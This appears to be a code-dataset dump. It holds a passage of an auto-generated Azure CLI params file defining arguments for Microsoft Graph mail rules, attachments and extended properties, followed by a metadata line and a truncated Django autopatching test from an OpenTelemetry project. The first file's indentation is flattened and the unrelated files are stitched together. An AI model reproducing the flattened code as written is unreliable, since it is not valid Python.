'json-string/@json-file.', arg_group='Exceptions')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must have attachments in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('header_contains', nargs='+', help='Represents the strings that appear in the headers of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Exceptions')
c.argument('exceptions_is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an approval request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be an auto reply in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be encrypted in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting request in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a meeting response in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an '
'incoming message must be permission controlled (RMS-protected) in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('exceptions_is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a read receipt in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be S/MIME-signed in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('exceptions_is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a voice mail in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('message_action_flag', arg_type=get_enum_type(['any', 'call', 'doNotForward', 'followUp', 'fyi',
'forward', 'noResponseNecessary', 'read', 'reply',
'replyToAll', 'review']), help='',
arg_group='Exceptions')
c.argument('not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must not be a recipient of an incoming message in order for the condition or exception to apply.',
arg_group='Exceptions')
c.argument('recipient_contains', nargs='+', help='Represents the strings that appear in either the '
'toRecipients or ccRecipients properties of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sender_contains', nargs='+', help='Represents the strings that appear in the from property of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private', 'confidential']), help='',
arg_group='Exceptions')
c.argument('sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be the only recipient in an incoming message in order for the condition or exception '
'to apply.', arg_group='Exceptions')
c.argument('sent_to_addresses', type=validate_file_or_dict, help='Represents the email addresses that an '
'incoming message must have been sent to in order for the condition or exception to apply. Expected '
'value: json-string/@json-file.', arg_group='Exceptions')
c.argument('sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the mailbox '
'must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Exceptions')
c.argument('sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in either a toRecipients or ccRecipients property of an incoming message in order '
'for the condition or exception to apply.', arg_group='Exceptions')
c.argument('subject_contains', nargs='+', help='Represents the strings that appear in the subject of an '
'incoming message in order for the condition or exception to apply.', arg_group='Exceptions')
c.argument('within_size_range', action=AddWithinSizeRange, nargs='+', help='sizeRange',
arg_group='Exceptions')
c.argument('microsoft_graph_message_rule_predicates_body_contains', nargs='+', help='Represents the strings '
'that should appear in the body of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_body_or_subject_contains_body_or_subject_contains',
nargs='+', help='Represents the strings that should appear in the body or subject of an incoming '
'message in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_categories', nargs='+', help='Represents the categories '
'that an incoming message should be labeled with in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_from_addresses', type=validate_file_or_dict,
help='Represents the specific sender email addresses of an incoming message in order for the '
'condition or exception to apply. Expected value: json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_has_attachments', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must have attachments in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_header_contains', nargs='+', help='Represents the strings '
'that appear in the headers of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='',
arg_group='Conditions')
c.argument('is_approval_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an approval request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_forward', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be automatically forwarded in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_automatic_reply', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be an auto reply in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_encrypted', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be encrypted in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_meeting_request', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting request in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_meeting_response', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a meeting response in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_non_delivery_report', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be a non-delivery report in order for the condition or exception to apply.',
arg_group='Conditions')
c.argument('is_permission_controlled', arg_type=get_three_state_flag(), help='Indicates whether an incoming '
'message must be permission controlled (RMS-protected) in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('is_read_receipt', arg_type=get_three_state_flag(), help='Indicates whether an incoming message '
'must be a read receipt in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_signed', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must be '
'S/MIME-signed in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('is_voicemail', arg_type=get_three_state_flag(), help='Indicates whether an incoming message must '
'be a voice mail in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_action_flag_message_action_flag',
           arg_type=get_enum_type(['any', 'call', 'doNotForward', 'followUp', 'fyi', 'forward',
                                   'noResponseNecessary', 'read', 'reply', 'replyToAll', 'review']),
           help='', arg_group='Conditions')
c.argument('boolean_not_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must not be a recipient of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_recipient_contains', nargs='+', help='Represents the '
'strings that appear in either the toRecipients or ccRecipients properties of an incoming message '
'in order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sender_contains', nargs='+', help='Represents the strings '
'that appear in the from property of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_sensitivity', arg_type=get_enum_type(['normal', 'personal', 'private',
'confidential']), help='',
arg_group='Conditions')
c.argument('boolean_sent_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the ccRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_only_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be the only recipient in an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_sent_to_addresses_sent_to_addresses',
type=validate_file_or_dict, help='Represents the email addresses that an incoming message must have '
'been sent to in order for the condition or exception to apply. Expected value: '
'json-string/@json-file.', arg_group='Conditions')
c.argument('boolean_sent_to_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of the '
'mailbox must be in the toRecipients property of an incoming message in order for the condition or '
'exception to apply.', arg_group='Conditions')
c.argument('boolean_sent_to_or_cc_me', arg_type=get_three_state_flag(), help='Indicates whether the owner of '
'the mailbox must be in either a toRecipients or ccRecipients property of an incoming message in '
'order for the condition or exception to apply.', arg_group='Conditions')
c.argument('microsoft_graph_message_rule_predicates_subject_contains', nargs='+', help='Represents the strings '
'that appear in the subject of an incoming message in order for the condition or exception to '
'apply.', arg_group='Conditions')
c.argument('microsoft_graph_size_range_within_size_range', action=AddWithinSizeRange, nargs='+',
help='sizeRange', arg_group='Conditions')
c.argument('assign_categories', nargs='+', help='A list of categories to be assigned to a message.',
arg_group='Actions')
c.argument('copy_to_folder', type=str, help='The ID of a folder that a message is to be copied to.',
arg_group='Actions')
c.argument('delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be moved to the '
'Deleted Items folder.', arg_group='Actions')
c.argument('forward_as_attachment_to', type=validate_file_or_dict, help='The email addresses of the recipients '
'to which a message should be forwarded as an attachment. Expected value: json-string/@json-file.',
arg_group='Actions')
c.argument('forward_to', type=validate_file_or_dict, help='The email addresses of the recipients to which a '
'message should be forwarded. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('mark_as_read', arg_type=get_three_state_flag(), help='Indicates whether a message should be marked '
'as read.', arg_group='Actions')
c.argument('mark_importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='', arg_group='Actions')
c.argument('move_to_folder', type=str, help='The ID of the folder that a message will be moved to.',
arg_group='Actions')
c.argument('permanent_delete', arg_type=get_three_state_flag(), help='Indicates whether a message should be '
'permanently deleted and not saved to the Deleted Items folder.', arg_group='Actions')
c.argument('redirect_to', type=validate_file_or_dict, help='The email addresses to which a message should be '
'redirected. Expected value: json-string/@json-file.', arg_group='Actions')
c.argument('stop_processing_rules', arg_type=get_three_state_flag(), help='Indicates whether subsequent rules '
'should be evaluated.', arg_group='Actions')
with self.argument_context('mail user-mail-folder update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-mail-folder-message create-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-mail-folder-message create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-mail-folder-message create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder-message create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-mail-folder-message delete-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-mail-folder-message list-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-mail-folder-message update-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-mail-folder-message update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-mail-folder-message update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-mail-folder-message update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-message create-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-message create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-message create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-message create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('mail user-message delete-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-message list-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-message update-attachment') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('attachment_id', type=str, help='key: id of attachment')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('content_type', type=str, help='The MIME type.')
c.argument('is_inline', arg_type=get_three_state_flag(), help='true if the attachment is an inline attachment; '
'otherwise, false.')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('name', type=str, help='The attachment\'s file name.')
c.argument('size', type=int, help='The length of the attachment in bytes.')
with self.argument_context('mail user-message update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('mail user-message update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('mail user-message update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
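# Illustrative usage sketch (not part of the generated params file): assuming these
# argument contexts are loaded by an Azure CLI extension whose command group is 'mail',
# the arguments registered above would surface as CLI flags, roughly like:
#   az mail user-message show-attachment --user-id <user-id> \
#       --message-id <message-id> --attachment-id <attachment-id> \
#       --select name size
# The exact invocation depends on how the extension's command table wires these contexts.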
| [line-length statistics and quality-signal metric columns for the preceding file] |
b778fc6f6b0e273e4d19c5784d476f695a937e1e | 5,385 | py | Python | tests/contrib/django/test_autopatching.py | ocelotl/opentelemetry-auto-instr-python-1 | f5c47bd1ee492ffde298794f283031c22891f60b | ["BSD-3-Clause"] | 2 | 2020-03-04T17:33:22.000Z | 2021-01-20T14:20:10.000Z |
tests/contrib/django/test_autopatching.py | ocelotl/opentelemetry-auto-instr-python-1 | f5c47bd1ee492ffde298794f283031c22891f60b | ["BSD-3-Clause"] | 4 | 2019-11-25T00:11:16.000Z | 2021-05-13T20:43:50.000Z |
tests/contrib/django/test_autopatching.py | ocelotl/opentelemetry-auto-instr-python-1 | f5c47bd1ee492ffde298794f283031c22891f60b | ["BSD-3-Clause"] | 3 | 2020-02-05T14:54:25.000Z | 2020-03-23T02:51:27.000Z |
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import django
from oteltrace.monkey import patch
from .utils import DjangoTraceTestCase
from django.conf import settings
from unittest import skipIf
class DjangoAutopatchTest(DjangoTraceTestCase):
def setUp(self):
super(DjangoAutopatchTest, self).setUp()
patch(django=True)
django.setup()
@skipIf(django.VERSION >= (1, 10), 'skip if version above 1.10')
def test_autopatching_middleware_classes(self):
assert django._opentelemetry_patch
assert 'oteltrace.contrib.django' in settings.INSTALLED_APPS
assert settings.MIDDLEWARE_CLASSES[0] == 'oteltrace.contrib.django.TraceMiddleware'
assert settings.MIDDLEWARE_CLASSES[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
@skipIf(django.VERSION >= (1, 10), 'skip if version above 1.10')
def test_autopatching_twice_middleware_classes(self):
assert django._opentelemetry_patch
# Call django.setup() twice and ensure we don't add a duplicate tracer
django.setup()
found_app = settings.INSTALLED_APPS.count('oteltrace.contrib.django')
assert found_app == 1
assert settings.MIDDLEWARE_CLASSES[0] == 'oteltrace.contrib.django.TraceMiddleware'
assert settings.MIDDLEWARE_CLASSES[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
found_mw = settings.MIDDLEWARE_CLASSES.count('oteltrace.contrib.django.TraceMiddleware')
assert found_mw == 1
found_mw = settings.MIDDLEWARE_CLASSES.count('oteltrace.contrib.django.TraceExceptionMiddleware')
assert found_mw == 1
@skipIf(django.VERSION < (1, 10), 'skip if version is below 1.10')
def test_autopatching_middleware(self):
assert django._opentelemetry_patch
assert 'oteltrace.contrib.django' in settings.INSTALLED_APPS
assert settings.MIDDLEWARE[0] == 'oteltrace.contrib.django.TraceMiddleware'
# MIDDLEWARE_CLASSES gets created internally in django 1.10 & 1.11 but doesn't
# exist at all in 2.0.
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceMiddleware' \
not in settings.MIDDLEWARE_CLASSES
assert settings.MIDDLEWARE[-1] == 'oteltrace.contrib.django.TraceExceptionMiddleware'
assert not getattr(settings, 'MIDDLEWARE_CLASSES', None) or \
'oteltrace.contrib.django.TraceExceptionMiddleware' \
not in settings.MIDDLEWARE_CLASSES
@skipIf(django.VERSION < (1, 10), 'skip if version is below 1.10')
def test_autopatching_twice_middleware(self):
assert django._opentelemetry_patch
# Call django.setup() twice and ensure we don't add a duplicate tracer
django.setup()
found_app = settings.INSTALLED_APPS.count('oteltrace.contrib.django')
assert found_app == 1
assert settings.MIDDLEWARE[0] == 'oteltrace.contrib.django.TraceMiddleware'
# MIDDLEWARE_CLASSES gets created internally in django 1.10 & 1.11 but doesn't
# exist at all in 2.0.
